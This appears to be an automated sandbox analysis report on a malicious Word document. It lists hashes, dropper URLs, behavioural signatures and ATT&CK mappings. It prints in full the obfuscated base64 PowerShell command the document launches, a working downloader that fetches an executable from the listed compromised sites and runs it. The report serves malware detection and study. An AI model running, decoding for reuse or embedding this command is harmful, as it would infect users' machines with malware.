d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18

General

Target

d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc
Size

239KB
MD5

50bdb4343c0816c1908b32ff2ba9cea3
SHA1

4ab1840794b41baf7c344663dc4013e45a3bc0ae
SHA256

d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18
SHA512

26f6db8694329f87e458da7fefef5e1a468f2b57aa1574e414ba20edb12c3c899f4cad69d17dec7752ff54880126ff69c3eba5491cae19d550887d373e2f1052
SSDEEP

3072:Di8rNzbWOlrV1c231w8N6eXENf7KnEhJivKie6B/w2yiWydwJt3MP0iIepuxQt/:UJiP/w2P83NikmV

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://tuankhoi.com/wp-content/CI2oG/

exe.dropper

https://www.microsystem.fr/newsletters/uITRJ/

exe.dropper

https://natfast.com/wp-content/geeVh/

exe.dropper

https://blog.smyrnaweb.com/cgi-bin/Kzd0vdC/

exe.dropper

https://mhkhardware.com/cgi-bin/Mrn/

exe.dropper

https://ostemeda.lt/wp-content/S/

exe.dropper

https://blog.techforing.com/wp-includes/3XgEg7/

exe.dropper

https://techzslack.com/wp-includes/gSXf/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3628	1600	POwersheLL.exe	82

Blocklisted process makes network request 7 IoCs

flow	pid	Process
23	3628	POwersheLL.exe
26	3628	POwersheLL.exe
30	3628	POwersheLL.exe
33	3628	POwersheLL.exe
36	3628	POwersheLL.exe
40	3628	POwersheLL.exe
42	3628	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
392	WINWORD.EXE
392	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3628	POwersheLL.exe
3628	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3628	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
392	WINWORD.EXE
392	WINWORD.EXE
392	WINWORD.EXE
392	WINWORD.EXE
392	WINWORD.EXE
392	WINWORD.EXE
392	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD IAAgACQATABFADUAYgAwAG8AIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewAyAH0AewA0AH0AIgAtAEYAIAAnAE0ALgAnACwAJwB5AHMAVAAnACwAJwBpAG8ALgBkAGkAUgBlAEMAVABPACcALAAnAGUAJwAsACcAUgB5ACcALAAnAFMAJwApACAAIAA7AHMAZQBUACAAZQBoAG8AIAAoACAAIABbAFQAeQBQAEUAXQAoACIAewA3AH0AewA1AH0AewA0AH0AewA2AH0AewAxAH0AewA4AH0AewAyAH0AewAzAH0AewAwAH0AIgAgAC0ARgAnAEEAZwBFAFIAJwAsACcAUwBFAFIAdgAnACwAJwBDAGUAUABPAEkATgBUACcALAAnAG0AQQBOACcALAAnAC4ATgBFACcALAAnAHQAZQBNACcALAAnAHQALgAnACwAJwBzAHkAUwAnACwAJwBpACcAKQAgACkAOwAgACAAJABNADcAaQB2ADYAaQAyAD0AKAAoACcAVgB0AHYAJwArACcAMgAnACkAKwAoACcAaAAnACsAJwBwAHIAJwApACkAOwAkAFoAMQB2AGIAdABuAHkAPQAkAEQAbgBrADIAMgBjAHMAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEYANABzAGMAdABpADIAOwAkAEYAcQB1AHkAZgBkAHgAPQAoACgAJwBZADQAJwArACcAegAnACkAKwAoACcAbgByACcAKwAnAGMAcQAnACkAKQA7ACAAIAAkAEwARQA1AEIAMABvADoAOgAiAEMAYABSAEUAQQB0AGAARQBEAGkAYABSAGUAYwB0AG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AJwArACgAJwBHAHoAYwBzADgAJwArACcAYgAnACkAKwAnADUAewAwAH0ARQBlAG0AJwArACcAcAB3AHIAcgB7ADAAfQAnACkAIAAtAGYAIABbAGMAaABBAFIAXQA5ADIAKQApADsAJABRADkAbABpAGgAMgBwAD0AKAAnAEoAJwArACcANQAnACsAKAAnAG4AYwAnACsAJwAxAHkAMgAnACkAKQA7ACAAJABlAGgATwA6ADoAIgBzAGUAQwBgAFUAUgBpAFQAeQBgAFAAUgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAZABzADIANgA1AGsAPQAoACcAVAAnACsAJwBpACcAKwAoACcANAAwAG8AZgAnACsAJwA5ACcAKQApADsAJABVADQANwB1AHAANAB2ACAAPQAgACgAJwBKACcAKwAoACcAMwBwACcAKwAnAHcAOQBzACcAKQApADsAJABNAGIAZQBrAGwAMQB2AD0AKAAoACcARwBiACcAKwAnAGQAJwApACsAJwB1AG8AJwArACcAdgB6ACcAKQA7ACQAVgB4AGsAcwAwADAAcQA9ACgAJwBGACcAKwAnADcAJwArACgAJwBqACcAKwAnAHoAOQBqAGYAJwApACkAOwAkAEMAcwA3AHUAcQA0AHIAPQAkAEgATwBNAEUAKwAoACgAJwAxADYAJwArACgAJwBWAEcAegAnACsAJwBjACcAKQArACgAJwBzADgAJwArACcAYgA1ADEAJwApACsAKAAnADYAVgBFAGUAbQAnACsAJwBwACcAKQArACgAJwB3AHIAcgAnACsAJwAxADYAVgAnACkAKQAtAGMAUgBFAFAAbABBAGMAZQAgACAAKABbAEMAaABBAHIAXQA0ADkAKwBbAEMAaABBAHIAXQA1ADQAKwBbAEMAaABBAHIAXQA4ADYAKQAsAFsAQwBoAEEAcgBdADkAMgApACsAJABVADQANwB1AHAANAB2ACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQASAA0AGEAMQAyAHQAMAA9ACgAKAAnAEUANwAnACsAJwB0ADgAJwApACsAJwBsACcAKwAnAHYAdQAnACkAOwAkAFUAZwB3AGcAXwAzAHYAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBsAEkARQBuAFQAOwAkAEwAeABkAGUAaAByAGEAPQAoACgAKAAoACcAaAB0AHQAcAA6AF0AWwAgADEAKQAnACsAJwAgAGoAagBrAGcAUwAgAFsAJwArACcAXQAnACsAJwAgACcAKQApACsAKAAoACcAWwBdAHcAXQBbACAAMQApACcAKwAnACAAagBqAGsAZwBTACAAWwBdACAAWwBdAHcAdAB1AGEAbgBrACcAKwAnAGgAbwBpAC4AYwBvAG0AXQBbACAAMQApACAAJwArACcAagBqACcAKwAnAGsAZwBTACcAKwAnACAAWwBdACAAWwBdAHcAdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AJwArACcAdABdACcAKwAnAFsAIAAnACsAJwAxACcAKwAnACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIABbAF0AJwArACcAIAAnACsAJwBbAF0AdwBDAEkAJwArACcAMgAnACsAJwBvAEcAJwArACcAXQBbACAAMQApACAAagAnACsAJwBqAGsAZwBTACcAKwAnACAAWwBdACcAKwAnACAAWwBdAHcAQABoAHQAdABwACcAKwAnAHMAOgBdACcAKwAnAFsAIAAxACcAKwAnACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAIABbAF0AIABbAF0AJwArACcAdwBdACcAKwAnAFsAIAAxACkAIABqAGoAawBnAFMAJwArACcAIAAnACkAKQArACgAKAAnAFsAXQAgACcAKwAnAFsAXQB3AHcAdwB3AC4AbQBpACcAKwAnAGMAcgBvAHMAJwArACcAeQAnACsAJwBzAHQAZQAnACsAJwBtAC4AZgAnACsAJwByAF0AWwAgACcAKwAnADEAKQAgAGoAagAnACsAJwBrAGcAUwAgAFsAXQAgAFsAXQB3AG4AZQB3AHMAbABlAHQAdABlAHIAcwBdACcAKwAnAFsAIAAxACkAIAAnACsAJwBqAGoAawBnACcAKwAnAFMAIABbAF0AJwArACcAIAAnACsAJwBbAF0AJwArACcAdwB1ACcAKwAnAEkAJwArACcAVAAnACsAJwBSAEoAJwArACcAXQBbACcAKwAnACAAMQAnACsAJwApACAAagBqACcAKQApACsAKAAoACcAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBAAGgAdAB0AHAAcwA6ACcAKwAnAF0AWwAnACsAJwAgADEAKQAgAGoAagBrAGcAUwAgAFsAXQAgAFsAXQB3AF0AWwAgADEAKQAgAGoAagAnACsAJwBrAGcAUwAnACsAJwAgAFsAXQAgAFsAJwArACcAXQAnACsAJwB3AG4AJwArACcAYQAnACkAKQArACgAKAAnAHQAZgAnACsAJwBhAHMAdAAuAGMAbwBtACcAKwAnAF0AWwAgADEAJwArACcAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAXQAnACsAJwAgAFsAJwArACcAXQB3ACcAKwAnAHcAcAAtACcAKwAnAGMAJwArACcAbwBuAHQAZQAnACsAJwBuAHQAXQBbACAAMQApACAAJwArACcAagAnACsAJwBqACcAKwAnAGsAJwApACkAKwAoACgAJwBnAFMAIAAnACsAJwBbAF0AJwArACcAIAAnACsAJwBbACcAKwAnAF0AJwArACcAdwBnAGUAJwArACcAZQBWAGgAXQAnACsAJwBbACAAMQApACAAJwArACcAagBqAGsAJwArACcAZwBTACAAWwBdACAAWwBdAHcAQABoAHQAJwArACcAdABwAHMAJwArACcAOgBdAFsAIAAxACcAKwAnACkAIABqAGoAawAnACsAJwBnAFMAJwArACcAIAAnACsAJwBbAF0AIABbAF0AJwArACcAdwBdACcAKQApACsAKAAoACcAWwAgACcAKwAnADEAKQAgACcAKwAnAGoAagBrAGcAUwAnACsAJwAgAFsAXQAgAFsAXQB3AGIAbABvACcAKwAnAGcALgAnACsAJwBzAG0AeQByACcAKwAnAG4AYQB3AGUAYgAnACkAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AJwArACcAXQBbACAAMQApACAAagBqAGsAZwBTACAAJwArACcAWwBdACAAWwBdACcAKwAnAHcAJwArACcAYwBnAGkALQAnACsAJwBiAGkAbgAnACsAJwBdACcAKwAnAFsAIAAxACcAKwAnACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAJwArACcAIABbACcAKwAnAF0AIAAnACsAJwBbACcAKwAnAF0AdwBLAHoAJwArACcAZAAwACcAKwAnAHYAZABDAF0AJwArACcAWwAnACsAJwAgADEAKQAnACsAJwAgAGoAagBrAGcAUwAnACsAJwAgAFsAJwArACcAXQAgAFsAXQB3AEAAJwArACcAaAB0AHQAcABzACcAKwAnADoAXQBbACAAMQApACAAagBqAGsAZwBTACAAWwBdACAAJwArACcAWwBdAHcAXQBbACcAKwAnACAAMQApACAAagBqAGsAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwBdAHcAbQAnACsAJwBoAGsAJwArACcAaABhACcAKwAnAHIAZAB3AGEAcgBlAC4AYwBvAG0AXQBbACAAMQApACcAKwAnACAAagBqAGsAZwBTACAAWwBdACcAKQApACsAKAAoACcAIABbAF0AdwBjAGcAaQAnACsAJwAtAGIAaQBuAF0AWwAgADEAKQAgACcAKwAnAGoAJwArACcAagBrAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAJwArACcAXQAnACsAJwB3AE0AcgAnACsAJwBuAF0AJwApACkAKwAoACgAJwBbACAAMQApACAAJwArACcAagAnACsAJwBqACcAKwAnAGsAZwBTACAAWwBdACAAWwBdAHcAQABoACcAKwAnAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAgADEAKQAgAGoAagBrAGcAUwAnACsAJwAgACcAKwAnAFsAXQAgAFsAXQB3AF0AWwAgADEAKQAgAGoAagAnACsAJwBrAGcAJwArACcAUwAnACsAJwAgAFsAXQAgAFsAJwArACcAXQB3AG8AJwArACcAcwB0AGUAbQBlAGQAYQAuAGwAJwArACcAdABdACcAKQApACsAKAAoACcAWwAgADEAKQAgAGoAagBrACcAKwAnAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAXQB3AHcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKQArACgAKAAnAG4AdABdAFsAIAAxACkAIABqAGoAJwArACcAawBnACcAKwAnAFMAJwArACcAIAAnACkAKQArACgAKAAnAFsAXQAgAFsAXQB3AFMAXQAnACsAJwBbACAAMQApACcAKwAnACAAagBqAGsAJwArACcAZwBTACAAJwArACcAWwAnACsAJwBdACAAWwAnACsAJwBdAHcAQABoAHQAdABwAHMAOgBdACcAKwAnAFsAIAAxACkAIABqAGoAawBnAFMAJwArACcAIABbAF0AJwArACcAIABbAF0AdwBdAFsAIAAnACsAJwAxACkAIABqAGoAawBnAFMAIAAnACsAJwBbAF0AIABbAF0AdwBiAGwAJwArACcAbwBnACcAKwAnAC4AdABlAGMAaABmAG8AcgBpAG4AZwAuACcAKwAnAGMAJwArACcAbwBtACcAKwAnAF0AWwAgACcAKwAnADEAJwArACcAKQAgAGoAagBrAGcAUwAnACsAJwAgAFsAXQAgAFsAJwApACkAKwAoACgAJwBdACcAKwAnAHcAdwBwAC0AaQAnACsAJwBuAGMAbAB1ACcAKwAnAGQAZQBzAF0AWwAgACcAKwAnADEAKQAgAGoAagBrAGcAUwAgAFsAXQAgAFsAXQAnACsAJwB3ADMAWABnAEUAZwA3AF0AWwAnACsAJwAgADEAKQAgAGoAagAnACsAJwBrAGcAUwAnACsAJwAgAFsAXQAgACcAKwAnAFsAXQAnACsAJwB3AEAAJwArACcAaAB0AHQAcABzADoAJwArACcAXQBbACAAMQApACAAagBqAGsAZwBTACAAWwAnACsAJwBdACAAWwBdAHcAXQBbACAAMQApACAAagAnACsAJwBqAGsAZwBTACcAKwAnACAAWwAnACkAKQArACgAJwBdACAAWwBdACcAKwAnAHcAdABlAGMAaAAnACsAJwB6AHMAbABhACcAKwAnAGMAJwApACsAKAAnAGsALgBjAG8AJwArACcAbQAnACkAKwAoACgAJwBdAFsAIAAxACkAIABqAGoAawBnACcAKwAnAFMAJwArACcAIABbAF0AIABbAF0AJwArACcAdwB3AHAALQBpAG4AYwBsAHUAJwArACcAZABlACcAKwAnAHMAJwArACcAXQAnACkAKQArACgAKAAnAFsAIAAnACsAJwAxACkAIABqAGoAJwArACcAawAnACsAJwBnAFMAIABbAF0AIABbACcAKQApACsAKAAoACcAXQAnACsAJwB3ACcAKwAnAGcAUwBYAGYAXQBbACAAMQAnACsAJwApACcAKwAnACAAagAnACsAJwBqAGsAZwBTACAAWwAnACsAJwBdACcAKQApACsAKAAnACAAJwArACcAWwBdAHcAJwApACkAKQAuACIAcgBlAGAAcABsAEEAQwBlACIAKAAoACgAKAAnAF0AWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagBrAGcAJwArACcAUwAnACkAKwAnACAAJwArACgAJwBbAF0AIAAnACsAJwBbAF0AdwAnACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4ACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBzAHAAbABgAGkAVAAiACgAJABSADcAdgAwAHkAYQBsACAAKwAgACQAWgAxAHYAYgB0AG4AeQAgACsAIAAkAFAAZABjAHEAcgA3AG8AKQA7ACQAWABxAGoAdwB1ADAAZgA9ACgAKAAnAFIAXwBtACcAKwAnAGMAJwApACsAKAAnAHEAdQAnACsAJwAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABZAGMAawB6AHYAbAA4ACAAaQBuACAAJABMAHgAZABlAGgAcgBhACkAewB0AHIAeQB7ACQAVQBnAHcAZwBfADMAdgAuACIARABPAGAAVwBOAGAAbABvAEEAZABmAGkAbABFACIAKAAkAFkAYwBrAHoAdgBsADgALAAgACQAQwBzADcAdQBxADQAcgApADsAJABJADEAYQBjAHkAaABfAD0AKAAoACcATQBzACcAKwAnAGYAeAAnACkAKwAoACcAcgAnACsAJwB0ADUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQAQwBzADcAdQBxADQAcgApAC4AIgBMAGUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA1ADQAMgA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAbgAzACcAKwAnADIAXwAnACkAKwAoACcAUAByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBDAFIAYABFAGAAQQBUAEUAIgAoACQAQwBzADcAdQBxADQAcgApADsAJABOAGEANgBtADAAXwAxAD0AKAAoACcASABqAHkAJwArACcAeQAnACkAKwAnAGkAJwArACcAZABiACcAKQA7AGIAcgBlAGEAawA7ACQATABkADIANwBtAG0AegA9ACgAJwBZAGUAJwArACcAYwA1ACcAKwAoACcAcwA1ACcAKwAnAGcAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAdgA5AHQANwBrAG8APQAoACcASAAnACsAKAAnAG0AbwAnACsAJwA5ACcAKQArACgAJwBsAHgAJwArACcAaQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDF6B2.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftv4udcq.sgj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
memory/392-15-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-16-0x00007FF962230000-0x00007FF962240000-memory.dmp

Filesize
64KB

Download
memory/392-5-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-6-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-8-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-12-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-11-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-10-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-13-0x00007FF962230000-0x00007FF962240000-memory.dmp

Filesize
64KB

Download
memory/392-9-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-7-0x00007FF964350000-0x00007FF964360000-memory.dmp

Filesize
64KB

Download
memory/392-1-0x00007FF9A436D000-0x00007FF9A436E000-memory.dmp

Filesize
4KB

Download
memory/392-14-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-2-0x00007FF964350000-0x00007FF964360000-memory.dmp

Filesize
64KB

Download
memory/392-26-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-27-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-0-0x00007FF964350000-0x00007FF964360000-memory.dmp

Filesize
64KB

Download
memory/392-4-0x00007FF964350000-0x00007FF964360000-memory.dmp

Filesize
64KB

Download
memory/392-103-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-3-0x00007FF964350000-0x00007FF964360000-memory.dmp

Filesize
64KB

Download
memory/392-90-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-91-0x00007FF9A436D000-0x00007FF9A436E000-memory.dmp

Filesize
4KB

Download
memory/392-92-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-102-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/392-96-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/3628-95-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download
memory/3628-71-0x000001A033120000-0x000001A033142000-memory.dmp

Filesize
136KB

Download
memory/3628-64-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads